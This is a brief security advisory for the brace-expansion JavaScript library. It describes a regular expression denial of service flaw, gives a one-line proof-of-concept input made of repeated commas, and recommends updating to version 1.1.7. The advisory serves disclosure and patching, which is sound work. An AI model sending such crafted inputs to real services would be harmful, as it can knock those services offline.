Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition. ## Proof of Concept ``` var expand = require('brace-expansion'); expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}'); ``` ## Recommendation Update to version 1.1.7 or later.